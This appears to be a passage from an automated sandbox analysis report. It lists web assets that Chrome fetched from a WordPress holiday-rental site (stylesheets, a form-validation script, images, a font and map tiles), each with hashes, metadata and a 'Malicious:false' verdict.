              Preview:/*! elementor-icons - v5.21.0 - 01-06-2023 */.@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.21.0);src:url(../fonts/eicons.eot?5.21.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.21.0) format("woff2"),url(../fonts/eicons.woff?5.21.0) format("woff"),url(../fonts/eicons.ttf?5.21.0) format("truetype"),url(../fonts/eicons.svg?5.21.0#eicon) format("svg");font-weight:400;font-style:normal}[class*=" eicon-"],[class^=eicon]{display:inline-block;font-family:eicons;font-size:inherit;font-weight:400;font-style:normal;font-variant:normal;line-height:1;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(359deg)}}.eicon-animation-spin{animation:a 2s infinite linear}.eicon-editor-link:before{content:"\e800"}.eicon-editor-unlink:before{content:"\e801"}.eicon-editor-external-link:before{content:"\e802"}.eicon-editor-close:before{content:"\e803"}.eicon-editor-list-ol:before{cont
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):5754
              Entropy (8bit):7.961279704283215
              Encrypted:false
              SSDEEP:
              MD5:BA81CBE6480036541615954D6AAE66AF
              SHA1:A14ABA4197C32FE0DF082CD0E8922791AA73A162
              SHA-256:76DD081AFAB116BB1B66A6BE74A84180E35DD48031DEF57A369F4EC32281D48A
              SHA-512:CF6307100AF8259F6F98AD37CAB6831C8808F7D30AF14D34FC637A2075394639B5BA68FB4DA0F701E469B21409EAC467451FDD813994E15BCCD6DA578D7C29EE
              Malicious:false
              Reputation:unknown
              Preview:RIFFr...WEBPVP8Le.../..?...(.$E..].b.....l..$)..nq./....e.6..hf..?......`...y.n..p.~xA.....@..%I%WD/.). <...........^P.V......E...t.:.KW.f.e.v.&..1C.!u...dY........$E..X..CE......RW....4..&..S.....YKa....;.2h(n.,..HI..[.?..|..B.:...Ba..s..?..y..L.f...b.\.B.Tv>.Y.y....n......$+...$"."+.,.....)=.G$Gj.....H0.R..*.._..+E.#.MJ.....!9_1.F.).Y@C.]..H..._X$a.s'v......z..;.....uvCjn.\...:...c....b.8..-w...?.d.h./A/_.,cO.@'........~g....L...&.%..@.=..F@.."...l.FD...I.A.....#...d...0$.F...;#l..mO..e..E..-O.D.....7....|..m.}.#.J.......m.o.-.}.[.`SA.....?.$X.~.;Uo......../........hh.........0<xu.....7..h........~....[.sQ......H......#'...'......6.]..G'Q.|.D...$n....5..;......=?.".x..-.$..6.G".2.6Z.\t.{D.....*..._. :`..5Y^R...=..;...x..v.l|.h.-.#z....=...<...e$~.....b.t.,."...O.AV......tP>...GD.D...kvN.-...-..D.D......^.$$x..?...E...+r).f............F...Xt.*.l|!.L..J..c.N..|Y.F.1$.w..zU..w.9R..wP.....]..O5.u.O...1\..^.......O,x.4j..*J8#y.].8n....S Z....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):5342
              Entropy (8bit):7.954972590738355
              Encrypted:false
              SSDEEP:
              MD5:3C3370C014A7A09C348AEA5DB9DBCC5B
              SHA1:7D179B8433A04E1D1E61B5B023A4F5541777BE80
              SHA-256:5D995BC9F823094E7BBF924FF7D570EB4A82FE838336701E2EEFE66F60D796AB
              SHA-512:EDF86FF2EC8D5FC9A0108078A499A15DEA03F80AE0913ADC091BB59F5624B9E7214D2269AA23B14431EFD7A98B1BA65AA0AA80DEC8BF3120DD36505DDE24225E
              Malicious:false
              Reputation:unknown
              Preview:RIFF....WEBPVP8L..../..?.....m%.N....B.j3r....6.m%Xj=.....AF....c....'...>. Q...2...9....N.y.Rd.8..........,3/T3...*R.'...*......M..T.{=.8y_.}.._;..ip..z...r...%.Wm!4....y...!.....Q...ok..u........U....D.7mm;3j7kZ.V.9....H.....}..w(......P.....#.I...-..a.^.<A..z.......{........[...XL....|65..p..e61...8.0...R..w..N..;....z..Q..t6o.....s....../h.V....w+.c..... .=?...D.....;XIA..Z...~I."+).....5.Qj..s>.......+..&.3Y..7.....F..C.*.w...lJKn.}.s..n{.9.....?...L...2f.)u.....o5.|Fm..x.:..>.#"..C...oQ..Fi".......h..h-U.2f..>\.&.............@.L&...z..TK3..I..u...[..i/_...r.y8 ....fC%]3^.*P...T..eS.../X....."./...j.j.....,......,v......yq.U..*..L..1T...a....1..\...........d..3.{....:.+`.K.c..i!k.......Q...../AFb.3..!.#M,.U.@. ...2. T@P.:....i.-.._...O..'...!.....O&.....^...d*.*(*.E..M`...j......5.w...9!,.........+(0.........S..0..U/...'.OQ.......s......G=.#....f.....;}...H.~,.J....Q)....Ni.._!,.l....W/.P{.A..[...w....}./.=....Lj....DE..u.....?U..E.... .2I.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
              Category:downloaded
              Size (bytes):18588
              Entropy (8bit):7.988601596032928
              Encrypted:false
              SSDEEP:
              MD5:115C2D84727B41DA5E9B4394887A8C40
              SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
              SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
              SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
              Malicious:false
              Reputation:unknown
              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
              Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):1806
              Entropy (8bit):7.869424927490126
              Encrypted:false
              SSDEEP:
              MD5:AFD40ACAEC5EA72601709DC0DD724FA3
              SHA1:8207CCA4BF9B1DEEDBF6B06877902F6B40D7FCCE
              SHA-256:B1D1E42259B39C100AFF5A0C6A430723B8A5C7644B26A31E54861E53F541E1C5
              SHA-512:FE0134461387EE4991585B847B62FA64F13650BB73DD7EA4D2A00557FA37B8BC6E70DA22259EF16F6725507C0AD973FFF32E00502B4BC228ABA33AAE06DB295D
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4017!3i2655!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=33304
              Preview:RIFF....WEBPVP8L..../..?...4...N..H.`...`s....l%?....?.....]XG.....(.O..............q..oj.f.....@......5.#)CS.k....*J*....XM... .S.m..t.....9.U...hk.QJ....(.n.6.!.A...L........................;..!k..3k<.........df...3./.fj .3.Ms0.`6Kf.h..al a...N+f"8.......Z..,rr..TY..2....1....a..`.......s^..u..u....C..X'.V...Y|..k$...-.6.%J..A...>,...Pb.....6...`w3.............. ..mL..d._....d..O.....h9fc./i<..B"...wRq......(...u.....B...4........C..o.kuC....Il.D3.l.o5v...)..4.....N1..v..._.?l..M..........o@...#-.{..G.WS.h.y.d.....#^P!-~.....X.... .j..-..9..iXx.....@..z..i..H.&.&.2>@.'.j...}<n.G..x.l.!6.C8..vz.?(....:U+......*.7|5.....F.."..JO./.....^T.....4../f.......b/.k..^5Hm...G.us.-..Q3.G..W"...%y..[...{....<n_..g.H.|.....~G.3.%.E8....!.).....2.}.-.R...4G}.VV.._/..6y..H.^.L<O....kJ...Z.E...K..,..s..}.<k..vWL{<.....].ph..._..V.P.r`<..4.m..)k...1+.Y.G.4/.n...y...>.V..1.rV.}...QD..Z.I.B.\O......t5.b.....%!.Q.[Y.Y..BBLR;n..._..e....H3..p..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (11513), with no line terminators
              Category:downloaded
              Size (bytes):11513
              Entropy (8bit):5.205720179763049
              Encrypted:false
              SSDEEP:
              MD5:EFC27E253FAE1B7B891FB5A40E687768
              SHA1:AD12044651FFAC0BADCD0E42F32EDEF91678B1FF
              SHA-256:46E36DD6CA93014E4915C723632BF180D27CC96CCFB7C26E69213E1A82129A62
              SHA-512:42FAD6D6BEEAB116CBE8B149DF6B64D65C4998C0A2CC0562BC831AD02ACD82F2B6B9B33836047AAFD6C2D7CF31A6E91FEACA42A2FA6C6077B7F737DEA40D36E6
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.8
              Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 82", baseline, precision 8, 1536x862, components 3
              Category:downloaded
              Size (bytes):172233
              Entropy (8bit):7.969681291663432
              Encrypted:false
              SSDEEP:
              MD5:8B931485EC8D844019B6BA501F5A9A56
              SHA1:418A4CA77BD81CD87C84024F0EBEB458EFAA5A11
              SHA-256:34F409FE8E0F882CD7A624160EEF5C665C09818AE8D7932EB0075CBF438B98D1
              SHA-512:AFAEBA89A46C67CD6153EE9EC512AB5F74DFF65A3C57A41D8AEA735DFAB6078AEEF7E0AF6A3A42E8A7A00BDAFE5C42A2E65375C9F6B0CBF35F309BCE97A53224
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2020/11/Chapel-47-1536x862.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......^...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....6m..[...>.....`O.t..6..5..:e..k......Z~...@H....m.(..._(d...v..g..3...+$^\@p.........Jn,..KQ.s..u.KHbR.K@..(..........1F)iqH...)qK..n)iqE..R.\P.qF)...".S.F)..R.1H..Q.v(...E7.&)1H.Q.q.b..E...B1M1Xp..`..`<U]`.J....M...5SX?.+..B) f.|(.. .......).Hhx..`...Z.). .e!k....wa./..I.b...g..._._z..'.......x
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (13734), with no line terminators
              Category:downloaded
              Size (bytes):13735
              Entropy (8bit):5.037856517559578
              Encrypted:false
              SSDEEP:
              MD5:35D290AFD71A6053D8195EA13170B4E9
              SHA1:A64676403BB5C23F9800963B0B8F0475B532601F
              SHA-256:E467F75601E845DA217AE845B688B227A19FBF1E8FC776A42A4905869496D2E2
              SHA-512:0136028681F47450835A9BD6345BB647C95F2BE3E963980E5B5E355F3CDC602772313640C5D9B72AE71252BBE8099B11DE5663F3FDE49B71A5170E42959F7788
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/jquery.fancybox.min.css?ver=1726496070
              Preview:@charset "UTF-8";body.fancybox-active{overflow:hidden}body.fancybox-iosfix{position:fixed;left:0;right:0}.fancybox-is-hidden{position:absolute;top:-9999px;left:-9999px;visibility:hidden}.fancybox-container{position:fixed;top:0;left:0;width:100%;height:100%;z-index:99992;-webkit-tap-highlight-color:transparent;-webkit-backface-visibility:hidden;backface-visibility:hidden;-webkit-transform:translateZ(0);transform:translateZ(0);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif}.fancybox-bg,.fancybox-inner,.fancybox-outer,.fancybox-stage{position:absolute;top:0;right:0;bottom:0;left:0}.fancybox-outer{overflow-y:auto;-webkit-overflow-scrolling:touch}.fancybox-bg{background:#1e1e1e;opacity:0;transition-duration:inherit;transition-property:opacity;transition-timing-function:cubic-bezier(.47,0,.74,.71)}.fancybox-is-open .fancybox-bg{opacity:.87;transition-timing-function:cubic-bezier(.22,.61,.36,1)}.fancybox-caption-wrap,.fancybox-infobar,.fancybox-to
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 789x789, components 3
              Category:downloaded
              Size (bytes):159607
              Entropy (8bit):7.961456076185491
              Encrypted:false
              SSDEEP:
              MD5:BD4B6962635B5FEFCA225A5E654209BF
              SHA1:C18159F8114D14979B0C604DAD10BAB2DEF1AB1A
              SHA-256:D90148EA4956CB69769C89AB92E0F9A13C4098CED6EAD7C6A22DB7CEA6588247
              SHA-512:BF576B3B5987FA343BBDCFA58189062B584E3DB8B9F24ACB841A555BF94237118B58D691A077C2D902E6A20D230746EE4DFFA7442CB716D3FD70D3E06D64BB09
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2023/10/logo-image.jpg
              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ ............acspMSFT....sawsctrl.......................-hand...=@..=@t,...".................................desc......._cprt........wtpt........rXYZ...,....gXYZ...@....bXYZ...T....rTRC...h...`gTRC...h...`bTRC...h...`desc........uRGB............text....CC0.XYZ .......T........XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv.......*...|.....u.....N.....b.......j.. C$.)j.~3.9.?.FWM6Tv\.d.l.uV~..,.6..........e.w.......C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefg
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 1536x1024, components 3
              Category:dropped
              Size (bytes):222618
              Entropy (8bit):7.975172409545165
              Encrypted:false
              SSDEEP:
              MD5:72C43664996C2A846853C027F49164C7
              SHA1:4D61A2CB404431152E16623F78863F7A4FC92B1D
              SHA-256:36847C6C32E3CD7082B4D83B30DB8097881CCFB0524D5FFDE33DEEF01F5C95DA
              SHA-512:8235517ABFD4E8642F505F2658547F05B333D9994179F747BD606CA3442B9CF5FDB0088FAB3D479C500CD5A2C55B45A0D4E427510E4CADA0A77ADE2DA7EE4D86
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..RR.W.3...M.<.)1@.HE8.b....&)....{a..a..ta.U.*v.g'ui-..$.C..=...#)".S.V...%...x.....c;..E.b....Q.(..f......1@.....QE0...QE..E.S..KE....(....RQ..P....u....i(.p..)(...Q.R.p..P(.\,;4.JZ....J_...E-%;.....Qp...&iA...)...Xx....p57)"QR-D..SR.I.-J..T.Y6RD.R(..QR.i.(..S.sS(..HP).S...Y..b2)..J.J.R.....T...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (10019)
              Category:downloaded
              Size (bytes):18468
              Entropy (8bit):4.942984129844562
              Encrypted:false
              SSDEEP:
              MD5:4601BA55044413706C2022CB6C1C3D05
              SHA1:5103EC2FBB389568EBF5CFE4FD721F3DF2FF7AEC
              SHA-256:FE513EF974B767510D0A2B9F1B4D3AFA53185B89AB617C869E5E3D6DB960192C
              SHA-512:8DAB2D19378E34B40043621AAC57B418E56486DCFEBD1A5991BE8A02EE6B071D07EC6BFD9408DEA8FF0198995DE9D42A46E66513D68B40B68056707E4E691E01
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.15.3
              Preview:@keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-30px,0)}70%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-15px,0)}90%{transform:translate3d(0,-4px,0)}}.bounce{animation-name:bounce;transform-origin:center bottom}@keyframes flash{50%,from,to{opacity:1}25%,75%{opacity:0}}.flash{animation-name:flash}@keyframes pulse{from,to{transform:scale3d(1,1,1)}50%{transform:scale3d(1.05,1.05,1.05)}}.pulse{animation-name:pulse}@keyframes rubberBand{from,to{transform:scale3d(1,1,1)}30%{transform:scale3d(1.25,.75,1)}40%{transform:scale3d(.75,1.25,1)}50%{transform:scale3d(1.15,.85,1)}65%{transform:scale3d(.95,1.05,1)}75%{transform:scale3d(1.05,.95,1)}}.rubberBand{animation-name:rubberBand}@keyframes shake{from,to{transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{transform:translate3d(-10px,0,0)}20%,40%
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):79169
              Entropy (8bit):4.969625174598435
              Encrypted:false
              SSDEEP:
              MD5:57FB9E2CFB317959F7824F4FBE950DBE
              SHA1:378AAA5CD626D05D5A45F21A5629BBB5C09BF534
              SHA-256:75A917EDA5C7D388ADAA10A684B5468D51DD043ED1C517BEC76B4AE0A6A4995D
              SHA-512:5B0371267FE722041C014F22C86A43BFD0C35F2826B6E918CC71BD7AA9B37CA85820D55D0A1409F37EFF4DCCE85FAE8AEA98EAB8F40FE2A1D36E0E3FB279D6F7
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/animate.css?ver=1726496070
              Preview:@charset "UTF-8";..../*!..Animate.css - http://daneden.me/animate..Licensed under the MIT license - http://opensource.org/licenses/MIT....Copyright (c) 2015 Daniel Eden..*/.....animated {.. -webkit-animation-duration: 1s;.. animation-duration: 1s;.. -webkit-animation-fill-mode: both;.. animation-fill-mode: both;..}.....animated.infinite {.. -webkit-animation-iteration-count: infinite;.. animation-iteration-count: infinite;..}.....animated.hinge {.. -webkit-animation-duration: 2s;.. animation-duration: 2s;..}.....animated.bounceIn,...animated.bounceOut {.. -webkit-animation-duration: .75s;.. animation-duration: .75s;..}.....animated.flipOutX,...animated.flipOutY {.. -webkit-animation-duration: .75s;.. animation-duration: .75s;..}....@-webkit-keyframes bounce {.. 0%, 20%, 53%, 80%, 100% {.. -webkit-animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000);.. animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000);.. -webkit-transform: translate
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1707, components 3
              Category:downloaded
              Size (bytes):526687
              Entropy (8bit):7.96309687379782
              Encrypted:false
              SSDEEP:
              MD5:FDD8426921B4135E3B5758DC8F43D142
              SHA1:7CEB6AE8D101B7362973DB51471A0F9DF1DBD4DD
              SHA-256:67E262DAE4100A2C0014C864615496AE10EBF8336890AAF8F94321AFD39DD9E2
              SHA-512:7E2B716BDF9F65437EC6B0C9851F21BF9780A43CD6FAE8399C003DDF25311A627481CA1DD61412936749FA5332CF8C3B7A5D529CEF091AEFD6F554BBBCC3C8FD
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2022/01/2021_4_V_0213-v1-1-scaled.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....S...U.=s.Py.3D.M(&.4....o$.4.Qa../..c....Zv}..@..QM.(.@..R..A.8.C..i..4.P..K..P1sK.J(..v...g4.u-4.\.P..G4.....(..6.@..RR..u(<Rc4...-%(....:.R.HB.\QK@.=)@..P..P)E.......1@...1K@.@....C.{Q.\Q.bBb...{S..JL..jgz`8Q.... ........R....1)h....J1K.1@.GzZ(.9.F)y.N(.aIKE.....RP0..).E.!..Z(..)1.N...f(.>...e..Q...F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (32039), with CRLF line terminators
              Category:dropped
              Size (bytes):37779
              Entropy (8bit):5.048676676554018
              Encrypted:false
              SSDEEP:
              MD5:55C61EB8802947BF0D14F5430DFDEBCD
              SHA1:462535569E9282274BDD71E0A1393052AFB426F5
              SHA-256:4FA72A8E292674529C8C0FDC8B0CCB7974E214D83E862316E91743ED7453B1C6
              SHA-512:7A43ACE9C2BADCF6E170CD09A0B4E53232E52F0E0F6E77522E2AF9E02A0ED8002C7437EFFA4E51E8B32226BBDB2D6C2D78D7C2E507615B8DCAE28F6756D274ED
              Malicious:false
              Reputation:unknown
              Preview:/*!.. * Isotope PACKAGED v2.1.1.. * Filter & sort magical layouts.. * http://isotope.metafizzy.co.. */....(function(t){function e(){}function i(t){function i(e){e.prototype.option||(e.prototype.option=function(e){t.isPlainObject(e)&&(this.options=t.extend(!0,this.options,e))})}function n(e,i){t.fn[e]=function(n){if("string"==typeof n){for(var s=o.call(arguments,1),a=0,u=this.length;u>a;a++){var p=this[a],h=t.data(p,e);if(h)if(t.isFunction(h[n])&&"_"!==n.charAt(0)){var f=h[n].apply(h,s);if(void 0!==f)return f}else r("no such method '"+n+"' for "+e+" instance");else r("cannot call methods on "+e+" prior to initialization; "+"attempted to call '"+n+"'")}return this}return this.each(function(){var o=t.data(this,e);o?(o.option(n),o._init()):(o=new i(this,n),t.data(this,e,o))})}}if(t){var r="undefined"==typeof console?e:function(t){console.error(t)};return t.bridget=function(t,e){i(e),n(t,e)},t.bridget}}var o=Array.prototype.slice;"function"==typeof define&&define.amd?define("jquery-bridget/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 256x256, components 3
              Category:downloaded
              Size (bytes):7705
              Entropy (8bit):7.893011556441214
              Encrypted:false
              SSDEEP:
              MD5:F674EA3C0515A07D73B37BA14EC38B36
              SHA1:816AD58AD16DC45033EA2ABEDB63A79461112D0F
              SHA-256:D0ADDAA722AE3A2820211C272FBDA384D01350305B163C60897FD8EB6B146FBB
              SHA-512:56524A474A732BE13D0648F5485D8D75C104BECE8192B3A616FDB30D6B921BF67F14B19562697684ABC43387CA7A833F8657642C3A45F72CF11C2E94BB1A4D54
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i9!2i251!3i165!4i256!2m1!1e1!3m12!2sen!3sGB!5e289!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmx8cC52Om9mZg!4e0!5m1!1e3!23i47083502&client=google-maps-embed&token=38639
              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.8..(...))..QE..QE..QE..QE..R.@.h...(".(.......-....Q.*...2c!.F+...U....r.y.;.U#..G+.......~.....B.2....u.."`....Nqvh.%.....K..#..S....[..>.|$....?:c...q...^.V.Q./-@.#..bo-Im.q...S/.A....,.q..)....V...($.....v...~X..f..".s...z~....p....vpwt.Cz.B.1.....`).T.*B..,.q.UrU....G'..N:"..b.W...b.P.E.P..8..H.c#.*..=.R1...@..H.9'...7..ZDp..\.........+w.3C&..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:downloaded
              Size (bytes):137
              Entropy (8bit):4.435465620764221
              Encrypted:false
              SSDEEP:
              MD5:493D0AEC5DA0E44D213233BC94BA48BC
              SHA1:2C80FF5D5D8CF0A8AB4C05C3A954F2E836AFCF52
              SHA-256:EF92E1432C188E5E56D8703367BB31E41DF2D85706E82977D5E107B67EE98002
              SHA-512:1F70E3F714FE2424623758EB2588D83991F3157E5203D38823C5B57C03AC8DE290A4567F5DF3BC92410839A6B52986876859347FAB153AA23B6232CA9EEFCF4B
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/elementor/css/post-13.css?ver=1726500315
              Preview:.elementor-13 .elementor-element.elementor-element-4f99877 > .elementor-widget-container{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):22059
              Entropy (8bit):4.975089830745468
              Encrypted:false
              SSDEEP:
              MD5:53C1F61943F3E157C938892C6EFC91AB
              SHA1:1EC1D0A8720E964038EF88F32C6309AB0A53E9AD
              SHA-256:36F839C6B4B85C6F47E465480D784FB7F3FE04E0AF1E58E0EF6D59CB74FDF4B7
              SHA-512:3F6C7946C94C269B82945C279534EA7BE354441B56BC0982DFE2AAF8E50F2FAE7566B5CAFFC67D0E7EB20893ED53BC874D4F6A337B69C01E1C98CBBFA417A444
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/custom.css?ver=1726496070
